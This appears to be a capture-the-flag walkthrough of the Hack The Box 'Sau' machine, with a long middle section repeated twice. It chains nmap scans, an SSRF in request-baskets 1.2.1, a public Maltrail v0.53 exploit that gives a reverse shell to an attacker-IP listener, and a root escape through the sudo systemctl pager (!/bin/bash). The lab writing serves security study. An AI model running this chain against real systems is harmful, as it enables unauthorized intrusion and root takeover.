SAU

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sS -T4 10.129.136.9 -p- -oA 10.129.136.9.portsQuick
 PORT     STATE SERVICE       VERSION
 22/tcp    open     ssh
 80/tcp    filtered http
 8338/tcp  filtered unknown
 55555/tcp open     unknown

 
root@htb:~$ sudo nmap -sV -sC -T4 10.129.24.8 -p 22,80,8338,55555 -oA 10.129.24.8.portsDetailed
 PORT     STATE SERVICE       VERSION
 22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
 |   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
 |_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
 80/tcp    filtered http
 8338/tcp  filtered unknown
 55555/tcp open     unknown
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.0 400 Bad Request
 |     Content-Type: text/plain; charset=utf-8
 |     X-Content-Type-Options: nosniff
 |     Date: Sun, 10 Aug 2025 17:58:30 GMT
 |     Content-Length: 75
 |     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
 |   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
 |     HTTP/1.1 400 Bad Request
 |     Content-Type: text/plain; charset=utf-8
 |     Connection: close
 |     Request
 |   GetRequest: 
 |     HTTP/1.0 302 Found
 |     Content-Type: text/html; charset=utf-8
 |     Location: /web
 |     Date: Sun, 10 Aug 2025 17:58:04 GMT
 |     Content-Length: 27
 |     href="/web">Found</a>.
 |   HTTPOptions: 
 |     HTTP/1.0 200 OK
 |     Allow: GET, OPTIONS
 |     Date: Sun, 10 Aug 2025 17:58:04 GMT
 |_    Content-Length: 0
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 SF-Port55555-TCP:V=7.94SVN%I=7%D=8/10%Time=6898DDAC%P=x86_64-pc-linux-gnu%
 SF:r(GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/htm
 SF:l;\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Sun,\x2010\x20Aug\
 SF:x202025\x2017:58:04\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\
 SF:"/web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x2
 SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
 SF::\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x
 SF:20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Sun,\x2010\x20Aug\
 SF:x202025\x2017:58:04\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ
 SF:est,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pla
 SF:in;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reque
 SF:st")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
 SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
 SF:x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
 SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
 SF:\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x204
 SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
 SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,6
 SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
 SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
 SF:r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
 SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
 SF:20Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\
 SF:r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Opti
 SF:ons:\x20nosniff\r\nDate:\x20Sun,\x2010\x20Aug\x202025\x2017:58:30\x20GM
 SF:T\r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20
 SF:name\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}
 SF:\$\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
 SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
 SF:x20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
 SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
 SF:close\r\n\r\n400\x20Bad\x20Request");
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln -T4 10.129.24.8 -p 22,80,8338,55555 -oA 10.129.24.8.vulnScan
 PORT   STATE SERVICE
 22/tcp    open     ssh
 80/tcp    filtered http
 8338/tcp  filtered unknown
 55555/tcp open     unknown

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit the flag located in the puma user's home directory.
//walk the application
root@htb:~$ BROWSER > http://10.129.24.8:55555/web

 * can create a basket
    - Basket '7gk1iew' is successfully created!
      Your token is: sLWaXc5ABZjcXWWqx0g-CLed-peaROvoXUkHXIDJQZqe
      Powered by request-baskets | Version: 1.2.1 
      
 * can view created basket
    - Basket: 7gk1iew
      Empty basket!
      This basket is empty, send requests to http://10.129.24.8:55555/7gk1iew 
      and they will appear here.

//conduct code review
root@htb:~$ BROWSER > http://10.129.24.8:55555/web > CTRL + U
  <script>
  (function($) {
    function randomName() {
      var name = Math.random().toString(36).substring(2, 9);
      $("#basket_name").val(name);
    }

    function onAjaxError(jqXHR) {
      if (jqXHR.status == 401) {
        $("#master_token_dialog").modal({ keyboard : false });
      } else {
        $("#error_message_label").html("HTTP " + jqXHR.status + " - " + jqXHR.statusText);
        $("#error_message_text").html(jqXHR.responseText);
        $("#error_message").modal();
      }
    }

    function addBasketName(name) {
      $("#empty_list").addClass("hide");
      $("#baskets").append("<li id='basket_" + name + "'><a href='/web/" + name + "'>" + name + "</a></li>");
    }

    function showMyBaskets() {
      $("#empty_list").removeClass("hide");
      for (var i = 0; i < localStorage.length; i++) {
        var key = localStorage.key(i);
        if (key && key.indexOf("basket_") == 0) {
          addBasketName(key.substring("basket_".length));
        }
      }
    }

    function createBasket() {
      var basket = $.trim($("#basket_name").val());
      if (basket) {
        $.ajax({
          method: "POST",
          url: "/api/baskets/" + basket,
          headers: {
            "Authorization" : sessionStorage.getItem("master_token")
          }
        }).done(function(data) {
          localStorage.setItem("basket_" + basket, data.token);
          $("#created_message_text").html("<p>Basket '" + basket +
            "' is successfully created!</p><p>Your token is: <mark>" + data.token + "</mark></p>");
          $("#basket_link").attr("href", "/web/" + basket);
          $("#created_message").modal();

          addBasketName(basket);
        }).always(function() {
          randomName();
        }).fail(onAjaxError);
      } else {
        $("#error_message_label").html("Missing basket name");
        $("#error_message_text").html("Please, provide a name of basket you would like to create");
        $("#error_message").modal();
      }
    }

    function saveMasterToken() {
      var token = $("#master_token").val();
      $("#master_token").val("");
      $("#master_token_dialog").modal("hide");
      if (token) {
        sessionStorage.setItem("master_token", token);
      } else {
        sessionStorage.removeItem("master_token");
      }
    }

    $(document).ready(function() {
      $("#base_uri").html(window.location.protocol + "//" + window.location.host + "/");
      $("#create_basket").on("submit", function(event) {
        createBasket();
        event.preventDefault();
      });
      $("#refresh").on("click", function(event) {
        randomName();
      });
      $("#master_token_dialog").on("hidden.bs.modal", function (event) {
        saveMasterToken();
      });
      randomName();
      showMyBaskets();
    });
  })(jQuery);
  </script>
  
 * potential vulnerable section
    - /api/baskets/" + basket
 
//verify w/ AI for second opinion
root@htb:~$ BROWSER > https://chatgpt.com
 query: identify vulnerabilities in the following code snippet
  <script>
  ...
  </script>
  
 response:
  1.DOM-based XSS (Cross-Site Scripting)
     - directly inserting user-controlled values into the DOM via .html() and 
       string concatenation without sanitizing them
     - If basket or data.token or jqXHR.responseText contains HTML or JavaScript
       (especially if they come from untrusted sources like the URL or API), an 
       attacker could inject arbitrary scripts.
        - $("#created_message_text").html("<p>Basket '" + basket + "' is successfully created!</p><p>Your token is: <mark>" + data.token + "</mark></p>");
        - $("#error_message_text").html(jqXHR.responseText);
        - $("#baskets").append("<li id='basket_" + name + "'><a href='/web/" + name + "'>" + name + "</a></li>");
  2.Insecure use of localStorage and sessionStorage for sensitive tokens
     - storing authentication tokens in localStorage and sessionStorage:
     - These are accessible to any JavaScript running on the page, including 
       malicious scripts injected via XSS. If XSS occurs, an attacker can steal 
       all tokens.
        - localStorage.setItem("basket_" + basket, data.token);
          sessionStorage.setItem("master_token", token);
  3.No input validation on basket name
     - The basket name comes from user input and is concatenated into both: 
        - HTML
        - API endpoints (url: "/api/baskets/" + basket)
     - If the API doesn’t properly validate input, this could lead to:
        - XSS (as mentioned above)
        - Path traversal or unexpected API behavior if special characters are allowed.
  4.Revealing sensitive server error responses
     - display raw jqXHR.responseText from failed AJAX calls:
     - If the backend returns debug details (stack traces, SQL errors), you may 
       leak sensitive server info to the browser.
        - $("#error_message_text").html(jqXHR.responseText);
  5.No CSRF protection
     - This code makes authenticated requests (POST /api/baskets/...) but 
       doesn’t include CSRF protections. If an attacker can get the user to 
       visit a malicious page, they might trigger unwanted API calls while the
       master_token is in sessionStorage.
//research vulnerability
root@htb:~$ BROWSER > google.com
 search: request-baskets | Version: 1.2.1
  https://notes.sjtu.edu.cn/s/MUUhEymt7#
  https://github.com/mathias-mrsn/request-baskets-v121-ssrf
  https://packetstorm.news/files/id/174128
  https://www.twingate.com/blog/tips/cve-2023-27163
  https://medium.com/@li_allouche/request-baskets-1-2-1-server-side-request-forgery-cve-2023-27163-2bab94f201f7
 
 search: cve-2023-27163
  https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMDARKLYNXREQUESTBASKETS-5406297
  https://github.com/entr0pie/CVE-2023-27163

//test
root@htb:~$ BROWSER > http://10.129.24.8:55555
 Request Baskets > Create
  Created
  Basket 'wnxbq0g' is successfully created!
  Your token is: KtnGwoOm2Gp_aTNxThR9KuJuvgKlOv2Ctv9d0ZZmwdkq
  Open Basket
 Basket: wnxbq0g > Settings (gear icon)
  Forward URL: http://{attackingIP}:{port}
   Basket is reconfigured
   
 * set the Forward URL to the attacking machine's IP and apply changes

//send a get request to the created basket to see what happens 
root@htb:~$ nc -nlvp 8080
 ...
root@htb:~$ curl http://10.129.220.189:55555/{basketID}
 Basket: 2iqxygg
 Requests are collected at http://10.129.229.26:55555/2iqxygg
 Requests: 1 (1)
 [GET]
 10:25:14 PM
 8/12/2025
 /2iqxygg
 Headers
 
root@htb:~$ nc ...
 ...
 listening on [any] 8080 ...
 connect to [10.10.14.114] from (UNKNOWN) [10.129.220.189] 42824
 GET / HTTP/1.1
 Host: 10.10.14.114:8080
 User-Agent: curl/7.88.1
 Accept: */*
 X-Do-Not-Forward: 1
 Accept-Encoding: gzip 

//
root@htb:~$ BROWSER > http://10.129.24.8:55555
 ...
 Basket: wnxbq0g > Settings (gear icon)
  Forward URL: http://127.0.0.180
   Basket is reconfigured
 Proxy Response: enabled
 Expand Forward Path: enabled
  
 * set the Forward URL to the local host address of the target
 * Proxy Response allows the basket to behave as a full proxy: responses from 
   the underlying service configured in forward_url are passed back to clients 
   of original requests. The configuration of basket responses is ignored in 
   this case.
 * Expand Forward Path forwards URL path will be expanded when original HTTP
   request contains a compound path.

root@htb:~$ BROWSER > http://10.129.229.26:55555/2iqxygg
 Documentation
 |
 Wiki
 |
 Issues
 |
 Log In
 ...
 
 Powered by Maltrail (v0.53)
  Hide threat
  Report false positive

root@htb:~$ BROWSER > google.com
 search: Powered by Maltrail (v0.53)
 results
  - https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
    https://github.com/spookier/Maltrail-v0.53-Exploit
    
//PoC
root@htb:~$ git clone https://github.com/spookier/Maltrail-v0.53-Exploit.git
root@htb:~$ cd Maltrail-v0.53-Exploit/
root@htb:~$ python3 exploit.py
 Error. Needs listening IP, PORT and target URL.
 
 * syntax: python3 exploit.py [listening_IP] [listening_PORT] [target_URL]
 
root@htb:~$ nc -nlvp 1337
root@htb:~$ python3 exploit.py 10.10.14.228 1337 http://10.129.229.26:55555/{basketID}

root@htb:~$ nc ...
 listening on [any] 1337 ...
 connect to [10.10.14.228] from (UNKNOWN) [10.129.229.26] 38548
$ whoami
 puma
 
//activate stable shell
$ script /dev/null -c bash
 Script started, file is /dev/null
puma@sau:/opt/maltrail$ 

 * add the following if required 
    # Ctrl + z
    stty -raw echo; fg
    # Enter (Return) x2

puma@sau:/opt/maltrail$ ls /home/puma
 user.txt
puma@sau:/opt/maltrail$ cat /home/puma/user.txt
 71d11e50696626f40cf1987eea11ea95
Submit the flag located in the root user's home directory.
//walk the application
root@htb:~$ BROWSER > http://10.129.24.8:55555/web

 * can create a basket
    - Basket '7gk1iew' is successfully created!
      Your token is: sLWaXc5ABZjcXWWqx0g-CLed-peaROvoXUkHXIDJQZqe
      Powered by request-baskets | Version: 1.2.1 
      
 * can view created basket
    - Basket: 7gk1iew
      Empty basket!
      This basket is empty, send requests to http://10.129.24.8:55555/7gk1iew 
      and they will appear here.

//conduct code review
root@htb:~$ BROWSER > http://10.129.24.8:55555/web > CTRL + U
  <script>
  (function($) {
    function randomName() {
      var name = Math.random().toString(36).substring(2, 9);
      $("#basket_name").val(name);
    }

    function onAjaxError(jqXHR) {
      if (jqXHR.status == 401) {
        $("#master_token_dialog").modal({ keyboard : false });
      } else {
        $("#error_message_label").html("HTTP " + jqXHR.status + " - " + jqXHR.statusText);
        $("#error_message_text").html(jqXHR.responseText);
        $("#error_message").modal();
      }
    }

    function addBasketName(name) {
      $("#empty_list").addClass("hide");
      $("#baskets").append("<li id='basket_" + name + "'><a href='/web/" + name + "'>" + name + "</a></li>");
    }

    function showMyBaskets() {
      $("#empty_list").removeClass("hide");
      for (var i = 0; i < localStorage.length; i++) {
        var key = localStorage.key(i);
        if (key && key.indexOf("basket_") == 0) {
          addBasketName(key.substring("basket_".length));
        }
      }
    }

    function createBasket() {
      var basket = $.trim($("#basket_name").val());
      if (basket) {
        $.ajax({
          method: "POST",
          url: "/api/baskets/" + basket,
          headers: {
            "Authorization" : sessionStorage.getItem("master_token")
          }
        }).done(function(data) {
          localStorage.setItem("basket_" + basket, data.token);
          $("#created_message_text").html("<p>Basket '" + basket +
            "' is successfully created!</p><p>Your token is: <mark>" + data.token + "</mark></p>");
          $("#basket_link").attr("href", "/web/" + basket);
          $("#created_message").modal();

          addBasketName(basket);
        }).always(function() {
          randomName();
        }).fail(onAjaxError);
      } else {
        $("#error_message_label").html("Missing basket name");
        $("#error_message_text").html("Please, provide a name of basket you would like to create");
        $("#error_message").modal();
      }
    }

    function saveMasterToken() {
      var token = $("#master_token").val();
      $("#master_token").val("");
      $("#master_token_dialog").modal("hide");
      if (token) {
        sessionStorage.setItem("master_token", token);
      } else {
        sessionStorage.removeItem("master_token");
      }
    }

    $(document).ready(function() {
      $("#base_uri").html(window.location.protocol + "//" + window.location.host + "/");
      $("#create_basket").on("submit", function(event) {
        createBasket();
        event.preventDefault();
      });
      $("#refresh").on("click", function(event) {
        randomName();
      });
      $("#master_token_dialog").on("hidden.bs.modal", function (event) {
        saveMasterToken();
      });
      randomName();
      showMyBaskets();
    });
  })(jQuery);
  </script>
  
 * potential vulnerable section
    - /api/baskets/" + basket
 
//verify w/ AI for second opinion
root@htb:~$ BROWSER > https://chatgpt.com
 query: identify vulnerabilities in the following code snippet
  <script>
  ...
  </script>
  
 response:
  1.DOM-based XSS (Cross-Site Scripting)
     - directly inserting user-controlled values into the DOM via .html() and 
       string concatenation without sanitizing them
     - If basket or data.token or jqXHR.responseText contains HTML or JavaScript
       (especially if they come from untrusted sources like the URL or API), an 
       attacker could inject arbitrary scripts.
        - $("#created_message_text").html("<p>Basket '" + basket + "' is successfully created!</p><p>Your token is: <mark>" + data.token + "</mark></p>");
        - $("#error_message_text").html(jqXHR.responseText);
        - $("#baskets").append("<li id='basket_" + name + "'><a href='/web/" + name + "'>" + name + "</a></li>");
  2.Insecure use of localStorage and sessionStorage for sensitive tokens
     - storing authentication tokens in localStorage and sessionStorage:
     - These are accessible to any JavaScript running on the page, including 
       malicious scripts injected via XSS. If XSS occurs, an attacker can steal 
       all tokens.
        - localStorage.setItem("basket_" + basket, data.token);
          sessionStorage.setItem("master_token", token);
  3.No input validation on basket name
     - The basket name comes from user input and is concatenated into both: 
        - HTML
        - API endpoints (url: "/api/baskets/" + basket)
     - If the API doesn’t properly validate input, this could lead to:
        - XSS (as mentioned above)
        - Path traversal or unexpected API behavior if special characters are allowed.
  4.Revealing sensitive server error responses
     - display raw jqXHR.responseText from failed AJAX calls:
     - If the backend returns debug details (stack traces, SQL errors), you may 
       leak sensitive server info to the browser.
        - $("#error_message_text").html(jqXHR.responseText);
  5.No CSRF protection
     - This code makes authenticated requests (POST /api/baskets/...) but 
       doesn’t include CSRF protections. If an attacker can get the user to 
       visit a malicious page, they might trigger unwanted API calls while the
       master_token is in sessionStorage.
//research vulnerability
root@htb:~$ BROWSER > google.com
 search: request-baskets | Version: 1.2.1
  https://notes.sjtu.edu.cn/s/MUUhEymt7#
  https://github.com/mathias-mrsn/request-baskets-v121-ssrf
  https://packetstorm.news/files/id/174128
  https://www.twingate.com/blog/tips/cve-2023-27163
  https://medium.com/@li_allouche/request-baskets-1-2-1-server-side-request-forgery-cve-2023-27163-2bab94f201f7
 
 search: cve-2023-27163
  https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMDARKLYNXREQUESTBASKETS-5406297
  https://github.com/entr0pie/CVE-2023-27163

//test
root@htb:~$ BROWSER > http://10.129.24.8:55555
 Request Baskets > Create
  Created
  Basket 'wnxbq0g' is successfully created!
  Your token is: KtnGwoOm2Gp_aTNxThR9KuJuvgKlOv2Ctv9d0ZZmwdkq
  Open Basket
 Basket: wnxbq0g > Settings (gear icon)
  Forward URL: http://{attackingIP}:{port}
   Basket is reconfigured
   
 * set the Forward URL to the attacking machine's IP and apply changes

//send a get request to the created basket to see what happens 
root@htb:~$ nc -nlvp 8080
 ...
root@htb:~$ curl http://10.129.220.189:55555/{basketID}
 Basket: 2iqxygg
 Requests are collected at http://10.129.229.26:55555/2iqxygg
 Requests: 1 (1)
 [GET]
 10:25:14 PM
 8/12/2025
 /2iqxygg
 Headers
 
root@htb:~$ nc ...
 ...
 listening on [any] 8080 ...
 connect to [10.10.14.114] from (UNKNOWN) [10.129.220.189] 42824
 GET / HTTP/1.1
 Host: 10.10.14.114:8080
 User-Agent: curl/7.88.1
 Accept: */*
 X-Do-Not-Forward: 1
 Accept-Encoding: gzip 

//
root@htb:~$ BROWSER > http://10.129.24.8:55555
 ...
 Basket: wnxbq0g > Settings (gear icon)
  Forward URL: http://127.0.0.180
   Basket is reconfigured
 Proxy Response: enabled
 Expand Forward Path: enabled
  
 * set the Forward URL to the local host address of the target
 * Proxy Response allows the basket to behave as a full proxy: responses from 
   the underlying service configured in forward_url are passed back to clients 
   of original requests. The configuration of basket responses is ignored in 
   this case.
 * Expand Forward Path forwards URL path will be expanded when original HTTP
   request contains a compound path.

root@htb:~$ BROWSER > http://10.129.229.26:55555/2iqxygg
 Documentation
 |
 Wiki
 |
 Issues
 |
 Log In
 ...
 
 Powered by Maltrail (v0.53)
  Hide threat
  Report false positive

root@htb:~$ BROWSER > google.com
 search: Powered by Maltrail (v0.53)
 results
  - https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
    https://github.com/spookier/Maltrail-v0.53-Exploit
    
//PoC
root@htb:~$ git clone https://github.com/spookier/Maltrail-v0.53-Exploit.git
root@htb:~$ cd Maltrail-v0.53-Exploit/
root@htb:~$ python3 exploit.py
 Error. Needs listening IP, PORT and target URL.
 
 * syntax: python3 exploit.py [listening_IP] [listening_PORT] [target_URL]
 
root@htb:~$ nc -nlvp 1337
root@htb:~$ python3 exploit.py 10.10.14.228 1337 http://10.129.229.26:55555/{basketID}

root@htb:~$ nc ...
 listening on [any] 1337 ...
 connect to [10.10.14.228] from (UNKNOWN) [10.129.229.26] 38548
$ whoami
 puma
 
//activate stable shell
$ script /dev/null -c bash
 Script started, file is /dev/null
puma@sau:/opt/maltrail$ 

 * add the following if required 
    # Ctrl + z
    stty -raw echo; fg
    # Enter (Return) x2

puma@sau:/opt/maltrail$ ls /home/puma
 user.txt
puma@sau:/opt/maltrail$ cat /home/puma/user.txt
 71d11e50696626f40cf1987eea11ea95
//privesc
puma@sau:/opt/maltrail$ sudo -l
 Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

 User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
    
puma@sau:/opt/maltrail$ systemctl --version
 systemd 245 (245.4-4ubuntu3.22)
 +PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN2 -IDN +PCRE2 default-hierarchy=hybrid
 
root@htb:~$ BROWSER >  google.com
 search: systemd 245 (245.4-4ubuntu3.22)
 results: https://packetstorm.news/files/id/174130
 
 * # Exploit Title: systemd 246 - Local Privilege Escalation
   # Exploit Author: Iyaad Luqman K (init_6)
   # Application: systemd 246
   # Tested on: Ubuntu 22.04
   # CVE: CVE-2023-26604

   systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. 
   This vulnerability allows a local attacker to gain root privileges.

   ## Proof Of Concept:
   1. Run the systemctl command which can be run as root user.
      sudo /usr/bin/systemctl status any_service

   2. The ouput is opened in a pager (less) which allows us to execute 
      arbitrary commands.

   3. Type in !/bin/bash in the pager to spawn a shell as root user.

//exploit the vulnerability
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
 WARNING: terminal is not fully functional
 -  (press RETURN)!/bin/bash
 !//bbiinn//bbaasshh!/bin/bash
 
 * this opens a new shell with the same privileges as the pager itself.

root@sau:/opt/maltrail# ls /root
 go  root.txt
root@sau:/opt/maltrail# cat /root/root.txt
 04dfee9342f1b037f03e1e194ab265ee
PreviousJERRY (APACHE TOMCAT)NextTHM

Last updated